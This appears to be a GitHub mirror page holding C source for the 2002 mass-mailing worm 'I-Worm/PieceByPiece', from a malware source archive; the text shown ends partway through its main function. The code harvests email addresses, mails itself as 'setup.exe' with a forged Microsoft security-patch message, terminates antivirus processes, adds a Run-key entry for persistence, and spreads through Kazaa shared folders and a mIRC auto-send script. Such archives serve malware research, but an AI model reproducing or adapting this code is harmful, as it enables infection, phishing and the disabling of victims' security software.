mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
879 lines
24 KiB
C
879 lines
24 KiB
C
/*
|
|
I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
|
|
For educational purpose only. Distribute under GPL.
|
|
Some lyrics from the song that inspired me:
|
|
|
|
"Cause nothing ever lasts forever
|
|
We're like flowers in this vase, together
|
|
You and me, it's pulling me down
|
|
Tearing my down, piece by piece
|
|
And you can't see
|
|
That's it's like a disease
|
|
Killing me now, it's so hard to breathe"
|
|
-Feeder <Piece by Piece>
|
|
*/
|
|
|
|
#include <winsock.h>
|
|
#include <fstream.h>
|
|
#include <tlhelp32.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
|
|
//--------------------------------------GLOBAL VARIABLES-------------------------------------
|
|
|
|
HWND hwnd;
|
|
WORD version = MAKEWORD(1,1);
|
|
WSADATA wsaData;
|
|
int nRet;
|
|
char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
|
|
char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
|
|
char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
|
|
SOCKET theSocket;
|
|
int i,err=0,c=0,connected=0,tim,sending=0;
|
|
SYSTEMTIME time;
|
|
double k;
|
|
DWORD basesize,ProcessId;
|
|
|
|
//--------------------------------------WNDPROC-----------------------------------------------
|
|
|
|
LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
|
|
|
|
//--------------------------------------GETASC------------------------------------------------
|
|
|
|
int getasc(char chr[1]) {
|
|
int i=0;
|
|
char c[1];
|
|
|
|
for (i=0;i<257;i++) {
|
|
c[0]=i;
|
|
if (chr[0]==c[0]) { return(i); }
|
|
}
|
|
}
|
|
|
|
//--------------------------------------BASE64-----------------------------------------------
|
|
|
|
void base64(char *file) { //Encodes a file using the "base 64" encoding
|
|
WIN32_FIND_DATA fis; //It's kinna shitty code, but it works just GREAT!
|
|
int i,j,n,done=0,k=0,lin=0;
|
|
double c=0;
|
|
char tmp[7];
|
|
DWORD totsize;
|
|
char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
|
|
|
|
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
|
|
|
|
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
|
|
|
|
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
|
|
|
|
fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
|
|
FindFirstFile(file,&fis);
|
|
totsize=fis.nFileSizeLow; //Get the file size in bytes
|
|
for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
|
|
|
|
buc1[0]=0;
|
|
xxx[0]=0;
|
|
f.get(cx[1]);
|
|
j=getasc(&cx[1]);
|
|
itoa(j,cx2,2);
|
|
if (strlen(cx2)<8) {
|
|
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
|
|
buc1[i]=0;
|
|
strcat(buc1,cx2);
|
|
} else strcpy(buc1,cx2);
|
|
buc2[0]=0;
|
|
f.get(cx[1]);
|
|
j=getasc(&cx[1]);
|
|
itoa(j,cx2,2);
|
|
if (strlen(cx2)<8) {
|
|
for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
|
|
buc2[i]=0;
|
|
strcat(buc2,cx2);
|
|
} else strcpy(buc2,cx2);
|
|
buc3[0]=0;
|
|
f.get(cx[1]);
|
|
j=getasc(&cx[1]);
|
|
itoa(j,cx2,2);
|
|
if (strlen(cx2)<8) {
|
|
for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
|
|
buc3[i]=0;
|
|
strcat(buc3,cx2);
|
|
} else strcpy(buc3,cx2);
|
|
xxx[0]=0;
|
|
strcpy(xxx,buc1);
|
|
done=0;
|
|
k=0;
|
|
while (done!=24) {
|
|
for (i=done;i<done+6;i++) {
|
|
tmp[k]=xxx[i];
|
|
k++;
|
|
}
|
|
tmp[k]=0;
|
|
done+=6;
|
|
n=strtol(tmp,NULL,2);
|
|
g<<base[n];
|
|
lin++;
|
|
if (lin==76) {
|
|
g<<endl;lin=0;
|
|
}
|
|
tmp[0]=0;
|
|
k=0;
|
|
}
|
|
|
|
}
|
|
|
|
//One char left so add 4 0s at the end
|
|
if (totsize%3==1) {
|
|
buc1[0]=0;
|
|
f.get(cx[1]);
|
|
j=getasc(&cx[1]);
|
|
itoa(j,cx2,2);
|
|
if (strlen(cx2)<8) {
|
|
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
|
|
buc1[i]=0;
|
|
strcat(buc1,cx2);
|
|
} else strcpy(buc1,cx2);
|
|
strcat(buc1,"0000");
|
|
done=0;
|
|
k=0;
|
|
while (done!=12) {
|
|
for (i=done;i<done+6;i++) {
|
|
tmp[k]=buc1[i];
|
|
k++;
|
|
}
|
|
tmp[k]=0;
|
|
done+=6;
|
|
n=strtol(tmp,NULL,2);
|
|
g<<base[n];
|
|
lin++;
|
|
if (lin==76) {
|
|
g<<endl;lin=0;
|
|
}
|
|
tmp[0]=0;
|
|
k=0;
|
|
}
|
|
g<<"==";
|
|
}
|
|
|
|
//Two chars left so add 2 0s at the end
|
|
if (totsize%3==2) {
|
|
buc1[0]=0;
|
|
f.get(cx[1]);
|
|
j=getasc(&cx[1]);
|
|
itoa(j,cx2,2);
|
|
if (strlen(cx2)<8) {
|
|
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
|
|
buc1[i]=0;
|
|
strcat(buc1,cx2);
|
|
} else strcpy(buc1,cx2);
|
|
strcat(buc1,"00");
|
|
done=0;
|
|
k=0;
|
|
while (done!=18) {
|
|
for (i=done;i<done+6;i++) {
|
|
tmp[k]=buc1[i];
|
|
k++;
|
|
}
|
|
tmp[k]=0;
|
|
done+=6;
|
|
n=strtol(tmp,NULL,2);
|
|
g<<base[n];
|
|
lin++;
|
|
if (lin==76) {
|
|
g<<endl;lin=0;
|
|
}
|
|
tmp[0]=0;
|
|
k=0;
|
|
}
|
|
g<<"=";
|
|
}
|
|
|
|
f.close();
|
|
g.close();
|
|
//Get the size of the encoded file
|
|
FindFirstFile("C:\\Msbootlog.sys",&fis);
|
|
basesize=fis.nFileSizeLow;
|
|
}
|
|
//--------------------------------------SENDMAIL---------------------------------------------
|
|
|
|
void sendmail() { //Sends an e-mail with MIME encoding
|
|
int ran;
|
|
|
|
sending=1;
|
|
//"HELO" the server
|
|
strcpy(myBuf, "HELO <");
|
|
strcat(myBuf,helo);
|
|
strcat(myBuf,">\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
recv(theSocket,Buf,sizeof(Buf),0);
|
|
|
|
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
|
|
strcpy(myBuf, "MAIL FROM:<");
|
|
strcat(myBuf,email);
|
|
strcat(myBuf,">\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
recv(theSocket,Buf,sizeof(Buf),0);
|
|
}
|
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
|
|
|
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
|
|
|
|
GetSystemTime(&time);
|
|
srand(time.wSecond);
|
|
ran=rand();
|
|
while (ran>c) {
|
|
srand(c);
|
|
ran=ran-rand();
|
|
}
|
|
if (ran<0) ran=ran*(-1);
|
|
strcpy(myBuf, "RCPT TO:<");
|
|
strcat(myBuf, emails[ran]);
|
|
strcat(myBuf, ">\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
recv(theSocket,Buf,sizeof(Buf),0);
|
|
}
|
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
|
|
|
if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
|
|
strcpy(myBuf, "DATA\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
recv(theSocket,Buf,sizeof(Buf),0);
|
|
}
|
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
|
|
|
if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
|
|
|
|
if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
|
|
strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
} else { //if we find a new address
|
|
strcpy(myBuf, "From: <");
|
|
strcat(myBuf, email);
|
|
strcat(myBuf, ">\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "Subject: Hello\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
}
|
|
|
|
strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, " boundary = \"bla\"\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "X-Priority: 3\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "--bla\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "--bla\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, " name = \"setup.exe\"\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, " filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
//Send the file byte by byte
|
|
fstream f("C:\\Msbootlog.sys",ios::in);
|
|
for (k=0;k<basesize;k++) {
|
|
f.get(ch[1]);
|
|
strcpy(myBuf,&ch[1]);
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
}
|
|
f.close();
|
|
|
|
strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
|
|
recv(theSocket,Buf,sizeof(Buf),0);
|
|
}
|
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
|
|
|
strcpy(myBuf, "QUIT\x0d\x0a");
|
|
send(theSocket,myBuf,strlen(myBuf),0);
|
|
}
|
|
|
|
//--------------------------------------GETPROCESSMODULE------------------------------------
|
|
|
|
BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
|
|
LPMODULEENTRY32 lpMe32, DWORD cbMe32)
|
|
{
|
|
BOOL bRet = FALSE;
|
|
BOOL bFound = FALSE;
|
|
HANDLE hModuleSnap = NULL;
|
|
MODULEENTRY32 me32 = {0};
|
|
|
|
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
|
|
if (hModuleSnap == (HANDLE)-1)
|
|
return (FALSE);
|
|
|
|
me32.dwSize = sizeof(MODULEENTRY32);
|
|
|
|
if (Module32First(hModuleSnap, &me32))
|
|
{
|
|
do
|
|
{
|
|
if (me32.th32ModuleID == dwModuleID)
|
|
{
|
|
CopyMemory (lpMe32, &me32, cbMe32);
|
|
bFound = TRUE;
|
|
}
|
|
}
|
|
while (!bFound && Module32Next(hModuleSnap, &me32));
|
|
|
|
bRet = bFound;
|
|
}
|
|
else
|
|
bRet = FALSE;
|
|
CloseHandle (hModuleSnap);
|
|
|
|
return (bRet);
|
|
}
|
|
|
|
//--------------------------------------PROCESSES---------------------------------------------
|
|
|
|
BOOL processes() //Various stuff with processes
|
|
{
|
|
HANDLE hProcessSnap = NULL;
|
|
BOOL bRet = FALSE;
|
|
PROCESSENTRY32 pe32 = {0};
|
|
|
|
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
|
if (hProcessSnap == (HANDLE)-1)
|
|
return (FALSE);
|
|
pe32.dwSize = sizeof(PROCESSENTRY32);
|
|
if (Process32First(hProcessSnap, &pe32))
|
|
{
|
|
DWORD dwPriorityClass;
|
|
BOOL bGotModule = FALSE;
|
|
MODULEENTRY32 me32 = {0};
|
|
do
|
|
{
|
|
bGotModule = GetProcessModule(pe32.th32ProcessID,
|
|
pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32));
|
|
if (bGotModule)
|
|
{
|
|
HANDLE hProcess;
|
|
hProcess = OpenProcess (PROCESS_ALL_ACCESS,
|
|
FALSE, pe32.th32ProcessID);
|
|
dwPriorityClass = GetPriorityClass (hProcess);
|
|
//Get the virus' filename
|
|
if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
|
|
|
|
//Anti AVs
|
|
if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
|
|
TerminateProcess(hProcess,0);
|
|
}
|
|
|
|
//Close the handle
|
|
CloseHandle (hProcess);
|
|
}
|
|
}
|
|
while (Process32Next(hProcessSnap, &pe32));
|
|
bRet = TRUE;
|
|
}
|
|
else
|
|
bRet = FALSE;
|
|
CloseHandle (hProcessSnap);
|
|
return (bRet);
|
|
}
|
|
|
|
//--------------------------------------FINDSERVER--------------------------------------------
|
|
|
|
void findserver() { //Gets a SMTP server and user name from the registry (if possible)
|
|
int i,j;
|
|
char key2[256];
|
|
unsigned char acc[1024],smtp[1024],eml[1024];
|
|
DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
|
|
HKEY hKey;
|
|
|
|
//Try getting a SMTP server from registry
|
|
strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
|
|
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
|
|
RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
|
|
RegCloseKey(hKey);
|
|
strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
|
|
j=strlen(key2);
|
|
for (i=0;i<8;i++){
|
|
key2[j+i]=acc[i];
|
|
}
|
|
key2[j+i]=0;
|
|
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
|
|
RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
|
|
RegCloseKey(hKey);
|
|
if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
|
|
i=0; //the new one
|
|
while (smtp[i]!=0) {
|
|
server[i]=smtp[i]; //Now this is the SMTP server
|
|
i++;
|
|
}
|
|
server[i]=0;
|
|
//Get the e-mail
|
|
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
|
|
RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
|
|
RegCloseKey(hKey);
|
|
if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
|
|
i=0; //the new one
|
|
while (eml[i]!=0) {
|
|
email[i]=eml[i]; //Now this is the "FROM:" e-mail
|
|
i++;
|
|
}
|
|
email[i]=0;
|
|
}
|
|
//Set a new "HELO" domain
|
|
i=strlen(email)-1;
|
|
j=0;
|
|
while (email[i]!='@') {
|
|
helo[j]=email[i];
|
|
j++;
|
|
i--;
|
|
}
|
|
}
|
|
helo[j]=0;
|
|
strrev(helo);
|
|
//end
|
|
}
|
|
|
|
//--------------------------------------FINDMAIL----------------------------------------------
|
|
|
|
void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
|
|
{
|
|
int ik,j=0;
|
|
char lin[256],*start,ch[1];
|
|
|
|
fstream f(file,ios::in);
|
|
while (f.get(lin,256))
|
|
{
|
|
start=strstr(lin,"mailto:");
|
|
if (start!=0)
|
|
{
|
|
j=0;
|
|
c++;
|
|
ik=start-lin+7;
|
|
ch[1]=lin[ik];
|
|
while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
|
|
{
|
|
emails[c][j]=ch[1];
|
|
j++;
|
|
ik++;
|
|
ch[1]=lin[ik];
|
|
}
|
|
emails[c][j]=0;
|
|
}
|
|
f.get();
|
|
}
|
|
f.close();
|
|
}
|
|
|
|
//--------------------------------------FINDFILES---------------------------------------------
|
|
|
|
void findfiles() { //Searches for .htm files in the temp. directories
|
|
WIN32_FIND_DATA f;
|
|
HANDLE hf;
|
|
int k=0;
|
|
char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
|
|
|
|
strcpy(pth2,windir);
|
|
strcat(pth2,"\\Temporary Internet Files\\*");
|
|
hf=FindFirstFile(pth2,&f);
|
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
|
|
while (FindNextFile(hf,&f)!=0 && k<20) {
|
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
|
|
k++;
|
|
}
|
|
FindClose(hf);
|
|
strcpy(pth2,windir);
|
|
strcat(pth2,"\\Temporary Internet Files\\");
|
|
strcat(pth2,pth1);
|
|
strcat(pth2,"\\*");
|
|
k=0;
|
|
hf=FindFirstFile(pth2,&f);
|
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
|
|
while (FindNextFile(hf,&f)!=0 && k<20) {
|
|
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
|
|
k++;
|
|
}
|
|
FindClose(hf);
|
|
strcpy(pth2,windir);
|
|
strcat(pth2,"\\Temporary Internet Files\\");
|
|
strcat(pth2,pth1);
|
|
strcat(pth2,"\\");
|
|
strcat(pth2,pth3);
|
|
strcpy(pth,pth2);
|
|
strcat(pth,"\\");
|
|
strcat(pth2,"\\*.htm");
|
|
k=0;
|
|
hf=FindFirstFile(pth2,&f);
|
|
while (FindNextFile(hf,&f)!=0 && k<70) {
|
|
if (f.cFileName[0]!='.') {
|
|
strcpy(path,pth);
|
|
strcat(path,f.cFileName);
|
|
findmail(path);
|
|
}
|
|
k++;
|
|
}
|
|
FindClose(hf);
|
|
}
|
|
|
|
//--------------------------------------CONECT------------------------------------------------
|
|
|
|
int conect() { //Connects to a server using "Winsock"
|
|
|
|
// Start up Winsock
|
|
i=WSAStartup(version, &wsaData);
|
|
if (i!=0) {return(0);}
|
|
|
|
// Store information about the server
|
|
LPHOSTENT lpHostEntry;
|
|
|
|
lpHostEntry = gethostbyname(server);
|
|
if (lpHostEntry == NULL) {
|
|
WSACleanup();
|
|
connected=0;
|
|
return(0);
|
|
} else connected=1; //This means we're connected
|
|
//Get important data
|
|
if (err==0) { //If we didn't run this allready and got an error
|
|
findserver();
|
|
findfiles();
|
|
}
|
|
// Create the socket
|
|
theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
|
if (theSocket == INVALID_SOCKET) {
|
|
WSACleanup();
|
|
connected=0;
|
|
return(0);
|
|
}
|
|
|
|
SOCKADDR_IN saServer;
|
|
saServer.sin_family = AF_INET;
|
|
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
|
|
saServer.sin_port = htons(25);
|
|
// Connect to the server
|
|
nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));
|
|
if (nRet == SOCKET_ERROR) {
|
|
WSACleanup();
|
|
connected=0;
|
|
return(0);
|
|
}
|
|
|
|
nRet = recv(theSocket,Buf,sizeof(Buf),0);
|
|
if (nRet == SOCKET_ERROR) {
|
|
WSACleanup();
|
|
connected=0;
|
|
return(0);
|
|
}
|
|
|
|
if (Buf[0]=='4' || Buf[0]=='5') err=1;
|
|
if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
|
|
sendmail();
|
|
}
|
|
//Close the connection
|
|
closesocket(theSocket);
|
|
// Shutdown Winsock
|
|
WSACleanup();
|
|
}
|
|
|
|
//--------------------------------------KAZAA-----------------------------------------------
|
|
|
|
void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
|
|
int i;
|
|
char kaza[256],kfile[3][20];
|
|
unsigned char kpth[1024];
|
|
DWORD kpthlen=sizeof(kpth);
|
|
HKEY hKey;
|
|
|
|
//The filenames
|
|
strcpy(kfile[0],"\\mirc6.exe");
|
|
strcpy(kfile[1],"\\winamp3.exe");
|
|
strcpy(kfile[2],"\\wincrack.exe");
|
|
strcpy(kfile[3],"\\icq2002.exe");
|
|
//Get the path to Kazaa from the reg.
|
|
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
|
|
RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
|
|
RegCloseKey(hKey);
|
|
if (kpth[0]>64 && kpth[0]<123) {
|
|
i=0;
|
|
while (kpth[i]!=0) {
|
|
kaza[i]=kpth[i];
|
|
i++;
|
|
}
|
|
kaza[i]=0;
|
|
}
|
|
GetSystemTime(&time);
|
|
srand(time.wSecond);
|
|
if (rand()%5==0) strcat(kaza,kfile[3]);
|
|
else if (rand()%4==0) strcat(kaza,kfile[2]);
|
|
else if (rand()%3==0) strcat(kaza,kfile[1]);
|
|
else if (rand()%2==0) strcat(kaza,kfile[0]);
|
|
CopyFile(file,kaza,FALSE);
|
|
}
|
|
|
|
//--------------------------------------INFECTWIN-------------------------------------------
|
|
|
|
void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
|
|
HKEY hKey;
|
|
unsigned char val[256];
|
|
char rnd[6];
|
|
int i=0;
|
|
|
|
strcpy(winbkup,windir);
|
|
strcat(winbkup,"\\System\\winsys");
|
|
GetSystemTime(&time);
|
|
srand(time.wSecond);
|
|
itoa(rand(),rnd,10);
|
|
strcat(winbkup,rnd);
|
|
strcat(winbkup,".exe");
|
|
//Copy file to Windows
|
|
CopyFile(file,winbkup,TRUE);
|
|
//Just in case there is no WinZip, use this path
|
|
strcpy(zippth,winbkup);
|
|
//Now make Windows run it at startup
|
|
while (winbkup[i]!=0) {
|
|
val[i]=winbkup[i];
|
|
i++;
|
|
}
|
|
val[i]=0;
|
|
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
|
|
RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
|
|
RegCloseKey(hKey);
|
|
}
|
|
|
|
//--------------------------------------MIRC--------------------------------------------------
|
|
|
|
void mirc() { //Creates a mIRC script
|
|
HKEY hKey;
|
|
unsigned char mircpth[1024];
|
|
char mirc[MAX_PATH];
|
|
int i=0;
|
|
DWORD mircpthlen=sizeof(mircpth);
|
|
|
|
//Get the path from our friend: the registry :)
|
|
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
|
|
RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
|
|
RegCloseKey(hKey);
|
|
i=1;
|
|
while (mircpth[i]!=0 && mircpth[i]!='.') {
|
|
mirc[i-1]=mircpth[i];
|
|
i++;
|
|
}
|
|
mirc[i-1]=0;
|
|
i=strlen(mirc);
|
|
while (mirc[i]!=92) {
|
|
mirc[i]=0;
|
|
i--;
|
|
}
|
|
strcat(mirc,"script.ini");
|
|
//Write a new script.ini
|
|
fstream f(mirc,ios::out);
|
|
f<<"[Script]"<<endl;
|
|
f<<"n0=ON 1:JOIN:#:{"<<endl;
|
|
f<<"n1=/dcc send $nick "<<zippth<<endl;
|
|
f<<"n2=}"<<endl;
|
|
f<<"n3=on 1:start:{"<<endl;
|
|
f<<"n4= /join #piecebypiece"<<endl;
|
|
f<<"n5=}"<<endl;
|
|
f.close();
|
|
|
|
}
|
|
|
|
//--------------------------------------ZIPIT-------------------------------------------------
|
|
|
|
void zipit(char *file) { //Zips the virus with a random name
|
|
HKEY hKey;
|
|
unsigned char zip[1024];
|
|
char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
|
|
int i=0;
|
|
DWORD ziplen=sizeof(zip);
|
|
|
|
//Get the path from the registry
|
|
i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
|
|
if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
|
|
RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
|
|
RegCloseKey(hKey);
|
|
i=0;
|
|
while (zip[i]!=0) {
|
|
zippath[i]=zip[i];
|
|
i++;
|
|
}
|
|
zippath[i]=0;
|
|
//Make a random filename for the .zip file
|
|
strcpy(zippth,windir);
|
|
strcat(zippth,"\\System\\win32sys");
|
|
GetSystemTime(&time);
|
|
srand(time.wSecond);
|
|
itoa(rand(),rnd,10);
|
|
strcat(zippth,rnd);
|
|
strcat(zippth,".zip");
|
|
//Zip it!
|
|
strcpy(param," -a -r ");
|
|
strcat(param,zippth);
|
|
strcat(param," ");
|
|
strcat(param,file);
|
|
ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
|
|
} else strcpy(zippth,file); //Else just use the executable file for mIRC
|
|
|
|
}
|
|
|
|
//--------------------------------------TIMERPROC---------------------------------------------
|
|
|
|
VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
|
|
|
|
if (sending==0) { //Check for a connection if a mail is not under delivery
|
|
conect();
|
|
if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
|
|
strcpy(server,"smtp.barrysworld.com");
|
|
strcpy(email,"john@barrysworld.com");
|
|
strcpy(helo,"barrysworld.com");
|
|
conect();
|
|
}
|
|
if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
|
|
}
|
|
}
|
|
|
|
//--------------------------------------PAYLOAD-----------------------------------------------
|
|
void payload() { //Every virus MUST have a payload ;)
|
|
MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
|
|
}
|
|
|
|
//--------------------------------------------------------------------------------------------
|
|
//Main function
|
|
//--------------------------------------------------------------------------------------------
|
|
|
|
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
|
|
WNDCLASSEX wndc;
|
|
MSG msg;
|
|
HKEY hKey;
|
|
unsigned char buf[1024],inf[]="yes";
|
|
DWORD buflen=sizeof(buf);
|
|
int first=0;
|
|
|
|
//Create a window
|
|
wndc.cbClsExtra = 0;
|
|
wndc.cbSize = sizeof(wndc);
|
|
wndc.cbWndExtra = 0;
|
|
wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
|
|
wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
|
|
wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
|
|
wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
|
|
wndc.hInstance = hInstance;
|
|
wndc.lpfnWndProc = WndProc;
|
|
wndc.lpszClassName = "ClassName";
|
|
wndc.lpszMenuName = NULL;
|
|
wndc.style = CS_HREDRAW|CS_VREDRAW;
|
|
RegisterClassEx(&wndc);
|
|
